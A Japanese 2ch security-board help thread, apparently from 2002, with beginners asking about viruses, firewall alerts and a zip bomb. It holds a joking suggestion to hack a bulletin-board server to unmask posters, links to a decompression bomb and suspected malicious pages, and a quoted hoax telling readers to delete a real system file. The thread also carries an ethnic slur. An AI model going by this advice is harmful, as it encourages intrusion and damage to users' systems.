やり方は Windows FAQ だ。

>>748 は >>747 へのレスじゃ

>>748
神様！教えに従い実行すると、あら不思議！消えました。
復元オフにしたことでメモリーされていた、ファイルが聞けたんですね。
CPYとは形のないファイルみたいなものなんですか？
ウィルスチェックでも発見されなくなり無事削除成功？
安心していいんですよね？
ど〜もありがとう。

×聞けた
○消えた
鬱だ･･･氏のう逝って来ます。

IDS (Intrusion Detection System) 侵入検知システムだな。
情報系に進学したいなら勉強しとけ、その他は学校の宿題でも終わらせとけ。
www.sfc.keio.ac.jp/~keiji/backup/ids/indexj.html

友人に勧められ、BackOrificeを使ってノートからデスクトップを操作することになったのですが、
不安に思いウイルススキャンをしてみたら案の定ひっかかりました。
これは悪用されるとヤバイ、ということは知っていたのですが、
まだセットアップもしていないのにウイルスとして検知されてしまうのでしょうか？

>>753
はぁ？ あの…BackOrificeって
たしかにリモート操作のツールではあるけど
超有名な「トロイの木馬」でもあるって知ってるよね？
検出しないウイルススキャンってあったら恐いような…。

ん？ 質問の意図が違うのか？　ん？ お？…ネタかな？

正月明け早々困ってます…
出勤してＰＣ立ち上げてネットにつないだら、プレインストールの
マカフィーに｢JS/kak@Ｍ｣がひっかかりました。
駆除成功と出るのに、何度も何度も検出します。
これは駆除できてないな〜と思って、定義ファイルなど更新して
みようと思ったのですが、できなくて、マカフィーのＨＰでは
製品版を買いなさい、といわれました。
むかついたので、ウィルスバスター２００２の体験版を
ダウンロードしてみたら、ウイルスが検出されなく
なっちゃったのですが…
これってどういうことでしょう？どうしたらいい？優しく教えて〜

それについてはコレがいいかと。
http://www.puchiwara.com/hacking/

>>755
マカフィーアンインストールしましたか？
ウイルスバスターもアンインストールして、もう一度
インストールし直しましょう

マカフィーは、コンパネの、アプリケーションの追加と削除で
アンインストールしてからいれました。
ウイルスバスター2002、入れなおしもやってみたのですが、
状況は変わりません。ただし、かわりにマカフィーの時は
検出できなかったX97M_LAROUX.Aウイルスを検出・駆除した
とゆってます。JS/kak@Ｍは一体どこへ…

名無し＠お腹いっぱい。さんレスありがとうございました。
確かに私がウイルスに犯されてるらしい・・・
でも、ＰＣ起動したとき最初文字が出るじゃないですか。
その最初に（メーカー名）Video　Bios・・・・って出るんですが
それって別に気にしなくてもいいのでしょうか。
なんでVideoなんだろうか・・・
全く素人すぎてすみません。。

すみません。名無しさん＠お腹いっぱい。さんでした。名前間違って
申し訳ありませんm(__)m

>>759
それは単にビデオカードの種類を表示してるだけでしょ

あと体験版じゃなくてちゃんと製品版買ってこいよ

>>737
ありがとうございました。早速文字化けしたタイトルを調べてみたのですが、
残念ながらどのタイプにも当てはまらないようで、なんと書いてあるかは
分かりませんでした。しかし、どうせロクなことではないと思うので、
分からなくて良かったのかもしれません。
（ちなみにこんな感じで化けてました→「subject:Re: 裙ﾌ�ｸﾝｳﾜﾖ」）
お手数をお掛けしてすみません。有り難うございました。

ハッカーです。
なんでも俺に聞きな、ヴぉけ！！

>>763
チンポは何センチれすか？？

>>765
どうやったのら〜〜〜？？？？？日付逆なのら。。。

>>765
ありゃりゃ？？？
でけたのら〜〜〜〜サンクスコ

そんなこと出来るんだ

そうなんだ。

そ、そういう事ら。。。

これは？

前からなの？？

いや後ろから読む。

くだらんテストはロビーでやれよ　厨房どもが
質問者と回答者に迷惑だ

IPが211から始まるのってどこの国ですか？
スキャン等かけてくるんですが。

>>762
たぶん韓国からの spamだと思われ。
ドメインかキャラクターセットに“ .kr” という文字があるんじゃない？
いずれにしてもわけのわからんメールは即削除あるよろし。

リンク追加希望

スパイウｴア発見専用ソフト｢Ad-aware｣
http://pc.2ch.net/test/read.cgi/sec/1003749900/l50

Agnitum Outpost
http://pc.2ch.net/test/read.cgi/sec/997301454/l50

W32.Badtransと思われる添付ファイル付きのメールが来ました。
自分はフリーメールでｄｉｏｎのアドレスの相手先に送ったメール
の返信がその問題のメールでした。

ファイルの名前は「NUDE_ME.MP3.scr｣で38KBだったと思います。
これって相手が意図的に送ったものだと思えないのですが。

http://www.agnitum.com/download/outpostfree.html

>>777
http://www.lavasoft.de/downloads.html

>>779
そうだよ　意図的に送ったものとは限らないよ

http://www.puchiwara.com/hacking/
コレなんかかなり面白いかと。

７６１でのお返事ありがとうございました
体験版だったとは・・・・
知人から譲り受けたPCだったもので
そうだとは知りませんでした

>643氏

遅レスすみません。
この板のどこかのスレにリンクがあったので飛んでいっただけです。
よって正式名称も何も覚えていないという始末・・・ちょっと首吊ってきます。
とにかくスタートアップを止めたいなら、このスレの475を参照して下さい。

・・・おわかりになる方、（できればリンク先も添えて）教えて差し上げて下せえ・・・　m(__)m

Badtransばら撒いた知人から賀状が着たんだけど、
対策法がわからずにＰＣが放置状態になってるそうな。
忙しいとかもっともらしい理由を書いてはいたんだが、
これからは手紙は郵便で送るって。
お前はもうＰＣ触るなって返事を書きたくなる。

>>786
そいつのPCのマザーボードを叩き割ってこい（w

>>786
そいつのｽﾀｰﾄｱｯﾌﾟにこれ入れとけ
http://live.2ch.net/test/read.cgi/festival/1008852023/74

778 名前：新mac板から来ました 投稿日：02/01/08 13:09
新mac板から来ました。後輩がウィンドウズのことで問い合わせを
して来たんですが、winのことは良く分からないので、寄らせて
もらいました。代理質問です。

vaio　PCVMX2
windows 98

カーネル３２とかいうウイルスに感染したとかで、
その後輩の知り合いに頼んで初期化インストールを試みたそうなんですが、
起動時に
F1がF2を押して下さいとかいう警告がでる　との事。
それを押すと普通に立ち上がるそうなんですが、買った時の
状態ではないすよね。

初期化してそれならば、ファームウエア関係かなとも思うんですが、
なにかアドバイスいただければと思います。

スレ違いかも知れませんが、よろしくお願いします。

これ、昨日初心者板で質問したんだけど、解決できなくて。
こっちで聞いてみようと思いました。
ちなみに、本人曰く、リカバリCDで初期化インストールしたそうです。


785 名前：名無し~3.EXE ﾒｪﾙ：sage 投稿日：02/01/08 16:08
>>778
それはたぶん、W32.Badtrans.B@mmだな。
セキュ板行けば解決方法見つかるだろ。

------------------
お邪魔します。当方マックユーザなのであまり詳しい事はわかりませんが、なんとか後輩の
力になってやりたくて書き込みました。アドバイス頂けると助かります。長文ｽﾏｿ

>>789
仮にそれが Badtrans.B ならば
初期化リカバリーした時点で駆除完了。

>起動時に F1がF2を押して下さいとかいう警告がでる　との事。
だから、これは原因が別にあるはずで、
そもそも、購入時の状態と違うのかどうかもこの文面ではわからん。

>>789

う〜ん、うまく説明できなくて恐縮ですが、
普通にwin98が立ち上がる前にF1またはF2を押して下さいって
出るらしいんですよ。

macだと、PRAMクリア、パワーマネージャーのリセット、
ファーストエイドなどの修復アプリ実行、ファームウエアのアップデート、など、いろいろやってみる事があるんだけど、
winわかんなくって．．

もう一度リカバリ再インストールするように言ってみようかな

>785
情報ありがとうございます。
うちのは噂に聞くwininits.exeではない（見つからない）ようですが、
ほとんど同じ症状。起動直後にAドライブへアクセス、txt、html、gif、
アドレス帳が次々と消えてゆく、という感じ。ノートンでは発見できず。
リカバーしても同じだったから、結構まえからシステムに感染してたのか、
パーティション分けて作ってたDドライブにまだ居るみたいです。
とにかく所在と正体が分からないんで、不安…。せめてスタートアップを
監視するか精密なログを取ってくれるソフトは無いかな、と思った次第。
海外のソフトなんでしょうか？　もうちっと探してみます！

>>791
CMOSの内容が不正なまま起動するとそんな表示が出る機種もあるけど
それだとメーカー機種特有の現象なので、これ以上は板違い。

然るべきWindows関連板で、機種名とOS等詳しく書いて訊くべし。
（なんとなくCMOS-RAMクリアだけで直りそうだが…）

ノートンインターネットセキュリティーファイアウォールのログに進入された形跡がありました
これはカンコック野郎に攻撃されたってことですよね？
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)
inetnum: 211.226.0.0 - 211.231.255.255
netname: KORNET
descr: KOREA TELECOM
descr: KOREA TELECOM Internet Operating Center
country: KR
admin-c: DL276-AP
tech-c: WK81-AP
remarks: ******************************************
remarks: Allocated to KRNIC Member.
remarks: If you would like to find assignment
remarks: information in detail please refer to
remarks: the KRNIC Whois Database at:
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed: [email protected] 20001212
changed: [email protected] 20010627
source: APNIC

person: Dongjoo Lee
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: DL276-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC
person: Won Kang
address: Korea Telecom
address: 128-9 Youngundong Chongroku
address: SEOUL
address: 463-711
country: KR
phone: +82-2-747-9213
fax-no: +82-2-766-5901
e-mail: [email protected]
nic-hdl: WK81-AP
mnt-by: MNT-KRNIC-AP
changed: [email protected] 20010523
source: APNIC

inetnum: 211.227.229.0 - 211.227.231.255
netname: KORNET-XDSL-MOKPO-KR
descr: MOKPO NODE
descr: 980 OKAMDONG MOKPOSI
descr: CHONNAM
descr: 530-420
country: KR
admin-c: GP1572-KR
tech-c: WK5137-KR

インターネット接続環境がYBBなんですが、
ZoneAlarmでローカルPCからのアクセスが防げません。

(ﾟ∀ﾟ)ｱﾋｬ

twest

どこかの板に直リンクしてあったアドを踏んだら、
クッキーを抜かれたらしく
ＰＣを立ち上げると、「ＭＳ−ＤＯＳプロンプト」が立ち上がり
「指定されたＣＯＭＭＡＮＤ検索ディレクトリが違います」って出るんですけど
どうすれば直るのでしょうか？どなたか教えてください。

>>797

>>3

>>798
失礼しました。
３のどこに行けばよいのでしょうか・・・。
すいませんがまたお願いします。

>>799
あなたは名前欄になんて入力したの？（ｗ

みみずんの過去ログ持ってる人
諸費用込みで5Kで譲ってください

前回、前々回と、どうしても買えない状況にあったし
こんかい、みみずんからCDはもう焼かない宣言出たので
困り果ててます

激しくスレ違いだけど許して

ADSLモデムにブロードバンドルーターを繋いで使ってるんですが、アクセス履歴やPing等をログとして記録したいです、
ルーターのグローバル側にログを記録するPCをダムハブで接続すれば可能でしょうか？

今日、一通のメールが届きました。
メール内容は、ウィルスに感染してアドレス帳に入っているすべての人にそのウイルスを送っている可能性があるので、即除去してくださいと言うものでした。
このウィルスは、14日間潜んでその後Cドライブを破壊してしまうそうです。
下記の手順でウィルスのチェック及び除去をお願い致します。

手順
1.“スタート” →　“検索” →　“ファイルやフォルダー”をクリック。
2.“名前”の欄に “sulfnbk.exe”　とタイプ。　←　これがウィルス
3.“探す場所”の欄に “C” ドライブが選択されている事を確認。
4.“検索開始” クリック。
5. もしファイルが見つかれば、絶対に開かないこと！
6. そのファイルを右クリックして、“削除”を左クリック。
7.'sulfnbk.exe'をごみ箱に移してもよろしいですか？の質問に対して “はい”をクリック。
8. デスクトップの “Recycle Bin” をダブルクリックし、“sulfnbk.exe” を削除 するか、“ごみ箱を空にする”をクリック。

もしこのウィルスがCドライブに見つかった方は、アドレス帳に入っている人全員に 同じ内容の メールをしてください。

>>803
有名なチェーンメールですね。

基本的な事なんですが、
＞アドレス帳に入っている人全員に 同じ内容の メールをしてください。
こんな事が書いてあるメールは信用しちゃダメです。

さっきこのZIPをDLして解凍したら、４００MB以上のBMPに化けてパソコンが固まりました。(TT)
これってわざとやってる嫌がらせでしょうか？
スキルのある方、もしよければ教えてください

ttp://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h8651.zip

>>805
そもそも、なんで400MBもあるBMPを、わざわざ表示しようとするの？
あなたのパソコンにはメモリはどれだけ搭載されてるの？
それで、表示できると思いましたか？

>>805
ZIP感染型ウイルス。

500 名前：これってブラクラ？ 投稿日：02/01/09 17:51 ID:???
セキュリティ板でもきいたのですがアホらしいのか誰も答えてくれませんでした...。
さっきこのZIPをDLして解凍したら、４００MB以上のBMPに化けてパソコンが固まりました。(TT)
これってわざとやってる嫌がらせでしょうか？
それとも私がDL手順を間違えた？
スキルのある方、もしよければ教えてください

ttp://www4.famille.ne.jp/~yo-ogawa/cgi-bin/bbs/dat/h8651.zip


501 名前：虎 投稿日：02/01/09 17:52 ID:???
>>500
有名な奴
単色の巨大なBMPファイルは、異様に圧縮効率が良いのだ。

>>806
レスありがとうございます。
わざわざ表示しようとした...というか、解凍する時点でいつもと違ってやたら時間がかかり、固まったかんじです。
で、あとで確かめたら400MBとか書いてあったという始末で。
もとのZIPは４００KBくらいでまさかそんなでかくなるとも思わなかったし...。

>792氏

782 ：名無しさん＠お腹いっぱい。 ：02/01/09 10:51
>>769
"StartStop"ね。ググルで検索すれば一発で見つかるよ。

とのことでしたので調べてみたところ、ありました。
http://www.tfi-technology.com/startstop.htm

>>807
さきほど初級ネット板でも教えていただきました。ありがとうございます。

>>808
入れ違いで書き込みになってすいません。解決しました。
お騒がせしてすいませんでした。

ATT00002.txt
って添付ファイルがついたウィルスくさいメールが送られて来たんですけど。（汗）
開けたら「ダウンロードしますか？」みたいなダイアログでたんで「いいえ」選択したんだけど、
大丈夫ですかね？

>464
感謝！「and」がいらなかったんですね…

ADSLモデムのランプが点滅していたので何だろうと思って、
ノートンインターネットセキュリティのイベントログを見てみると
http://windowsupdate.microsoft.com/ident.cab
に何度もアクセスしているようなんです。
しばらくすると止まりましたが、
イベントログのweb履歴に同じようなのが大量に記録に残ってます。
これって何なんでしょうか？

>>812
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_BADTRANS.B

プレビューしちまったのかい？

>815
あ、やっぱりバッドトランスですかね？
駆除ツール落としてきたけど「感染していません」ってでたもんで。（ｗ；

ある日気づくとウインドウの左上の「閉じる」や「最大化」や「最小化」などが
数字になっていました。０とか２とか。
また、いろんなダイアログボックス？のチェックボックスも変な記号に
変ってしまいました。
仕事に使っていて特に困ることもないんですが、なんか不気味です。。
それとチェックボックスは変な記号のせいで、チェックが入ってるのかどうか
わからないときもあります。。

友達に話すとトロイなんじゃないのって言われたんですが。。

ちなみにトレンドマイクロ社のオンラインウイルス検索
してみたんですが何もひっかかりませんでした。

何かご存知の方お教えください！
よろしくお願いします！

すみません、ウインドウの右上でした。

>>817
Win98か？
起動ドライブ\windows内のttfcache捨ててリブートすれ。
別に危ないもんじゃない。仕様だ仕様（笑

819さんありがとうございます！

Win98です。
なぜかttcache というのが見つかりません。
これも検索してみたんですが。。

でもとりあえずウイルスじゃなくてよかったですー。

>820
見つからない場合は、ここ読む。
ttp://homepage2.nifty.com/winfaq/fontstrouble.html

>>820
ttcacheは隠しファイルだから、マイコンピュータ→表示→フォルダオプション
→詳細設定で「すべてのファイルを表示する」にチェックをする。
それから削除しれ。

かぶっちゃったね。スマソ。

>>817
ttcacheでなくttfcacheだぞ。
ようはこれ↓
ttp://homepage2.nifty.com/winfaq/fontstrouble.html

がいーん
漏れもカブッタ

知らない間に起動ドライブの\TEMPにTEMPVT.EXEというファイル(28672バイト)が
できていたのですが、何物なんでしょうか。

はっっ！ほんとだ、f が抜けてた、、

直りました〜！よかった。。
みなさんほんとにありがとうございましたー！

>>825
ぴんぽーん！カブって正解だ。

不正解だった

NISが入ってるPCにpingを打っても弾かれて、MSのホームネットワークが繋がらないんだけど
何を許可してあげたらいいのか教えてください。

ADSLにして、不安なのでとりあえずゾーン・アラーム入れました。ｖ２．６です。
で、シマンテックのセキュリティチェックしてみると、ほかはすべてステルスなんですが、
「ブラウザのプライバシースキャン」の項目が「要注意」でした。
解決するには
・個人用のファイアウォールのインスト。
・ファイアウォールのインストをしてある場合、個人情報を保護する設定が正しくないか、サポート外の可能性がある。
と出ました。
ＯＳはＷｉｎＸＰで、ＯＳについてるファイアーウォールは有効にしてありますが、それではダメだと言われてるんでしょうか。
やっぱり有償のファイアーウォールを入れた方がいいんでしょうか。
webの参照履歴がwebサイトに流出するリスクがあると脅かされましたが、それってヤバイことなんでしょうか。
宜しくお願いします。

>>831
べつにいいんじゃないの？

>>831
そんなのほっとけ。リンク元ぐらい知れたって困らない。
どうしても困るなら、URLコピぺで貼りつけて直接飛べ。

え、いいとは・・・？
まあ参照履歴が見られてもいいと言えばいいんですけど。
ひょっとしてそこから派生するトラブルとかもあるのかなあと、ちょっとビビリまして。
とりあえず、レスありがとうございます。

>>832
>>833
ありがとうございます。困ることはないんですが、赤い文字で注意されて初心者なりにビビリました（ｗ
ルーター入れるか、有償ソフト買うか考えるところでした（まああったに越したことはないんでしょうけど）
安心しました。ありがとうございます。

>>835
要するに危機感煽って購買意欲わかせるのが目的の一つだからね。
それだけとはいわないし、ｲｲソフトだとは思うけど。

>>836
そうですよね。煽られてるんだろうなーとか思いながらも、常時接続にしたばっかりなんで、こっちは警戒心の固まりですから（ｗ
購入等は、もうちょっと色々勉強してから考えてみます。
ありがとうございます。

ローカルの恥ずかしい名前を知られるのはちょっと困る

>>838
それってローカルにブックマークファイルを置いてる場合？
それ…アクセスできないけど。。。
自分サイトに自分用のブックマークを置いてる場合は困るかも？

コンピュータ名のことだと思われ。

漏れは無難にsolar systems付けてます。

3,4年前は関係ないページをrefererとしてもらす場合があったが、今は直ってるのか?

Linuxで使えるFreeのFirewallでお勧めありますか？
WindowsはNortonとTinyPFを使っています。

>>842
お前が対策してれば直ってる

>>843
あるよ

ZONEALARM入れてるんですが、同じところから数分おきに何十回もマルチキャストとか
ブロックするのって、気にしなくていいんですか？なんで、同じところから来るんでしょう？
ちなみに今日だけだと思います。向こうもこっちもYBB。最後の数字だけが違います。
218.119.120.×

ウイルスバスターOn-Line Scan
http://housecall.antivirus.com/housecall/start_jp.asp

の件で相談なのですが、
WinME　で、トロイの木馬の検索プログラムの
DOSプロンプト画面が表示されないないのですが、
何が原因なんでしょうか？

>>846
MeでDos使う時は起動ディスクからじゃないと使えないとかなんとか聞いたことがあるけど、
その関係かなぁ・・・。

２ちゃんねるでカキコする時に、本文に英文字を使うと
名前を入れてるのに『名前を入れて下さい』と、出るんですけど…
…動作も少し不安定なんで、ウィルスかと思うと戦々恐々です。

>>848
　>>583
　>>628
　>>639

ProxomitronってFWの役目を果たせるのでしょうか？

＞848
NGワードを使っているんじゃないですか？
ＮＧワードのガイドライン
http://ton.2ch.net/test/read.cgi/gline/1001964600/

＞850
残念。無理。

なぜか初質スレが落ちてる

>>846
表示が後のほうに隠れてるか、
最小化で実行されてるんじゃない？

ウイルスバスター２００２使用者です。
トレンドマイクロ社のＨＰを調べたのですが、ちょっとわからないのでここで質問させてください。
NTTの　フレッツADSLを使用しています。
フレッツ接続ツール画面が起動するのにやたらと時間がかかります。
以前”通信速度が低下する”という話がありましたが、これとは別で回線速度が下がるのではなく
フレッツ接続ルーツ画面を開くのが遅い、接続プロバイダのアイコンを
クリックするまで時間がかかる。
といった症状です。
どなたかそのような経験はありませんか？
よければ教えてください。

>>854
うちノートンだけど全く同じ状況だよ。
サービス開始のタイミングが変わってしまって、ネットワーク接続が必要なサービスより後になっちゃうんだよね。
うちはフレッツ接続ツールあきらめて、raspppoeっての入れてそっちで接続するように変えました。

８５４です。
早速の回答ありがとうございます。
ウイルスバスターだけでなく、アンチウイルス系ではみんなそうなってしまうんですね。
勉強になりました。rasppoe ですか？初耳ですが、調べてみます。
ありがとうございました。

>>851
そんなものがあるんですか！？
…たしかに、アップローダのアドレス入れるとダメだったンで、
直リン禁止用か、要注意モノだったのかもしれませんね…
どうも、ありがとうございました。　（きもっち晴れば〜れ♪）

テレホあげ

すみません

さっきからZone　Alamrmが
ZoneAlarm blocked data sent over the Internet
to port 1108 on your machine from port 53
on a remote computer whose IP address is 211.0.138.67.
としつこく言ってるんですけど、放置しておいてもよろしいのでしょうか？

なにぶん初心者なもので。宜しくお願いします。

>>859
ZoneAlarmは、そのIPアドレスが211.0.138.67である遠隔の
コンピューター上のポート53からのあなたの機械上で1108を
運ぶためにインターネット上に送られたデータを閉鎖しました。

リモートアドレス：61.144.145.34:1585から接続しようとしてる奴がいるけど
だれ？

>>861
チャイニーズ

では211.0.138.67はだれ？

>>862
さんきゅ！
ノートンで拒否してれば大丈夫だな

>>859
日本語化しる！
ttp://www.ryulife.com/net/zonealarm.html

>>860
>>865

いや、言ってる意味はわかるんですけど、
あんまりしつこいから放って置いてもいいのかなと思いまして。

>>866
プロバはaccsnetなの？

ヘタにこちらから何かすると…

質問あります、、
今度、ISDNにする事になったのですが、ターミナルアダブターという物が
必要らしいのですが、たくさん種類があり、全くどれがいいか見当がつきません
どれにしたらいいんでしょうか？

>>869
プロバイダーのホームページ（FAQなど）に接続実績のある
TAが紹介されていることが多いよ。
（板違いネタだね）

了解です、ありがと。

Win98SEなんだけど、エクスプローラーのHドライブ（CD−Rドライブ）
の下にH:って奴が2つできてるんだけどこれってウィルスかな？
,docの書類（ワードパッドとかの）のアイコンが付いてるんだが・・。
でもこれといって変な症状は無いんだけど。
誰か分かる人いたら教えてくれ。

ＷＯＲＭ　ＧＯＰ　Ａっていうウィルスに感染してしまいました。
オンラインスキャンして解ったんですが、駆除不可能です。しかも
http://inet.trendmicro.co.jp/virusinfo/isp/default3.asp?VName=WORM_GOP.A
のとおり「検索条件に一致するウイルス情報はありません。 」だそうです。
感染経路は多分数日前に来た中国語のメールからだと・・・
実感できる被害はまだないですけど、だれか対処法を教えてください！
お願いします！

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_GOP.A

ノートンのＦＷを入れたら２ＣＨブラウザ（ぞぬ、かちゅ〜しゃ）が使えなくなりました。
セキュリティのチェックをはずすか、ＦＷ自体を終了させると使えるようになります。

できればどなたかＦＷの設定の仕方を、教えていただけませんでしょうか？

>>873ありがとうございます！！マジで感謝！

>>875
ノートンのスレッドにいって、１を見てみて下さい。

間違えた！
>>874に感謝です。

ウイルスと思われますが、踏んでしまいました。
ウイルスバスターは起動中でしたが、大丈夫でしょうか？
不安です。
どうすれば良いでしょうか？教えてください。
ttp://www.top.or.jp/~godhand/a2.html

>>879
気にしなくていいよ

サンキュウです。
安心しました。

亀レスですみません(今起きました)
>>867
そうです。
では211.0.138.67は
同じLANの中の人ってことでしょうか？

ADSLで常時接続になったのですが、ＰＣの電源を切っているときは
セキュリティのことは考えなくていいのでしょうか？
電源切っているときは、ゾーンアラームも動いていないわけですし。。

>>883
1993年に､コロンビアの麻薬王パブロ･エスコバルの居場所が突き止められたのは
一部は携帯電話の利用データをもとにしたからだ
これはピンポインティングと呼ばれる技法だ。

昔、雑誌で見たことあるんですけど
家庭用の指紋照合システムって、今でも売ってるんでしょうか？
個人向けに発売されたもので、さほど高くないと聞きました。
指紋が一致しなければ、ＰＣを起動できないんだそうです。
あったら、ぜひ買いに行きたいです。
それとも、もうお店には無いんでしょうか？
・・・パソコン屋のどこの売り場に行けばいいのかな？

そのうちノートＰＣに内蔵させるために合体させたいです。（私には無理ですが）

>>885
エシュロンみたいなシステムの核心にはすべて
トラフィックパターンの詳細なデータベースがあるのはまちがいない。
ほとんどの通信が暗号化されていない世界では
暗号化された通信はたぶんそれだけで確実に記録保存されるだろう。
通話者が傍受されたがっていないということを示唆しただけで
十分に警戒すべき存在と見なされるだろうから。

俺には>>885と>>886がつながらんのだが。

皆さん、何で調べてＩＰアドレスからアクセス元をサクっと割り出しているのですか？
なんかそんな事ぐらい、やっとかなきゃいけないのかな、と思ってしまいました。

>>888
IPドメインのサーチサイトがある

>886=884 さん
オモロイな。

ＮＩＳを使っていてJS.Exception.Exploitというウイルスに感染してしまいましたが
駆除できません。ウイルス定義は1/9です。どうしたら良いのか教えてください

ＰＤＦのパスワードクラックってどうすれば？

>>890
すべてのファイルがスキャン対象
として設定されているか確認→システム全体のスキャン
出てきたの全部削除

>>892さんありがとうございます。さっそくやってみます

家庭用指紋照合システムって、やっぱり使ってる人いないのかな？
自分以外にＰＣをさわらせたくない時なんか
かなり有効だと思うんですけど・・・。
ウィンドウズを起動する時にパスを必要とする方法なんか
簡単に突破されてしまいますし・・・。

>>894
そこまでして隠したい物とは何ですか？

>>895
それは人それぞれでしょう(笑)

>895
ＰＣの中身全てです。
別に変なものがあるわけではなく、プライバシーの問題です。
もともと、セキュリティ意識が高いほうなので
気になるんです。

まあ、一番大事なのは、メール、次に大事なのは文書ファイル。
何がなんでも、自分以外の人にＰＣをさわらせたくは無いんです。
似たようなソフトでも、買ったほうがよいのでしょうか？
自分以外はＰＣを使えなくするソフトがあるって、聞いた事があります。

>>897
えっと、もすこし自分以外を信じたら？
↓一応ね
http://www.vector.co.jp/vpack/filearea/win/util/security/login/index.html

>>897
恥ずかしいポエムとかオナニー日記でもつけてるのか？（ｗ

むちゃくちゃ初歩ですみませんが……
ADSLのルーター型モデムって、ある程度安全なのですか?(ちなみにACCA、富士通8M)。
ちょっと不安なのですが……

>>900
ある程度安全です。

掲示板(ＰＣ携帯共用)の書き込み者のＩＰ見る方法教えてください。
偽者の判別にすごく困ってるんです。おかげで掲示板で信用失うし。
自分のＩＰまで暴かれました。色々検索してみたけど全然わかりません。
決して悪用するつもりはないのでよろしくお願いします。
そういう情報のあるサイトを教えていただくだけでも結構です。

>>902
どこのサイトなのか使ってるcgiはなんなのか書けよ。
たいていの場合、特殊な環境でIPばらされたら、犯人はそこの管理人だよ。

次スレhttp://pc.2ch.net/test/read.cgi/sec/1010952801/l50

９５０になったら徐々に移行してください

ニュース受信中にウィルス監視してくれるアンチウィルスソフトはないですか？

age

　

From:"SaveBig"< [email protected] >
To: [email protected]
Subject:Get the Credit You Deserve!
Date:**
Received:from [207.250.144.213]by sparklist.com
with ESMTP id leave-savebig-2158367U
From [email protected]
List-Unsubscribe:
< mailto:[email protected] >
-----
You are currently subscribed to savebig as: [email protected]
To unsubscribe send a blank email to mailto:[email protected]

>>902
今日だけ特別に教えてやろう。

まずソースを見ろ、コメントで埋め込んであることがある。
それで駄目なら、その掲示板の配布元を調べてデータファイルのデフォルト名を探せ。
readme.txt,README.txtをあさってみるのも良いだろう。
それでも駄目なら鯖をハクしろ、共有鯖ならそこのアカウントを取って内部から穿る。
鯖のOSが判ったらハクツールあさるか、セキュリティ勧告を元にハクしろ。
>>902が女ならば鯖を管理しているISPの従業員の前でパンツを脱ぐのが一番確実だ。

>>909
最後の一行に惚れた(笑)。

ソーシャルハクの基本にして最高確実なワザだ＜パンツ脱ぐ

マイクロソフトとオフィス２０００の修正プログラムを
ダウンロードしたら、ＩＥを立ち上げ時の初期ページが
ＭＳＮのＨＰに変わってしまいました。
設定を変更して、再度立ち上げてもＭＳＮが出てきます。
あと、検索をクリックするとエロサイトのＨＰらしき画面が
勝手にでてきた。プログラムが書き換えられたと思う。
さんざん外出だろうけど、直す方法知ってる人いますか？

>>912
自分のスレを片付けろよ　厨房

＞909
ありがとうございます！ISPの従業員がホモならパンツ脱ぎます(笑）
とりあえず挑戦してみますが、またわからなかったら質問させてください！
感謝！

>>912
おまえがエロいからアダルトサイトにつながるんだ。
まずは煩悩を振りはらえ。

EverQuestをやろうとしたらファイアーウォールに引っかかって
ログオンできないのですがrootパスワードも何も無いのですが
できるようにする方法ありますか？
家にはわけのわからん兄貴構築のUNIXサーバー(ルーター&DHCP)

どうしても設定を変えてくれないので何方か方法知ってましたら
教えてください。(EverQuestをやるのに必要なポートはわかって
います)　　やっぱむりかな・・・。

兄貴を殺す

以上。